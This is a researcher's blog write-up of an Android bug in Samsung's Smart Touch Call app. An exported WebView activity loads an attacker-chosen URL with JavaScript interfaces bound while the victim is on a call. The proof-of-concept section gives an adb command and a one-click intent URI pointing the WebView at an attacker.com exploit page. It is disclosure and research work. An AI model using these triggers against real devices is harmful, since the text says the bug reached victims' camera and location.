Skip to content
← All research

My First Android 0-day at Samsung S25, Later Used in Pwn2Own

Jan 13, 20263 min read

This is my first 0-day at Samsung, and it came back a duplicate. The app has plenty of bugs, but this one was used at Pwn2Own this year by Interrupt Labs. They did not disclose anything, but having tested the app myself I think it is the only bug in it. They escalated it far enough to reach the victim's camera and location — the demonstration is linked at the end.

What Smart Touch Call is

Smart Touch Call is a Samsung feature that overlays a visual, interactive menu on the screen while you are on a call to Samsung support: tracking repairs, finding service centres, product registration, troubleshooting. It is a self-service layer over a voice call, so you do not sit through a phone tree.

How a user reaches it:

  1. Call Samsung customer care.
  2. Press 1, or follow the prompt, to opt in when it is offered.
  3. An SMS arrives with a link that opens the visual menu on the device.
  4. Tap through the menu — service centre, repair booking, product information.

Samsung's own announcement

Where the bug is

Starting, as usual, with AndroidManifest.xml:

An exported WebView activity, so the URL inside it is ours to control — but two checks stand in the way.

Check one — Samsung values

It looks for Samsung-specific values, and the intent we are going to send satisfies it already.

Check two — are you on a call

This is the real precondition: the device has to be in a call.

The extras

After the checks it reads two extras — URL and httpMethod. Those are what matter.

They go to postUrl — the same as loadUrl, except it sends a POST request.

Neither check looks at the URL itself.

What is attached to the WebView

So we control the request. The question that decides how far this goes is always the next one: what is bound to this WebView?

First, JavaScript is enabled — confirmed by loading enable-javascript.com inside it.

The rest is readable straight from the WebView code:

And there are many @JavascriptInterface methods bound to it:

So all it takes is the victim tapping an attacker link while on a call.

Attack flow

Proof of concept

Method 1 — ADB command.

adb shell am start \
  -n com.samsung.android.visualars/com.samsung.android.visualars.web.activity.WebViewActivity \
  -a android.intent.action.VIEW \
  --es URL "https://attacker.com/exploit.html" \
  --es httpMethod "POST"

Method 2 — intent URI, one click from a browser.

intent://stc#Intent;
  scheme=stc.scheme;
  action=android.intent.action.VIEW;
  component=com.samsung.android.visualars/com.samsung.android.visualars.web.activity.WebViewActivity;
  S.URL=https://attacker.com/exploit.html;
  S.httpMethod=POST;
end;

Samsung CVE for Interrupt Labs in ZDI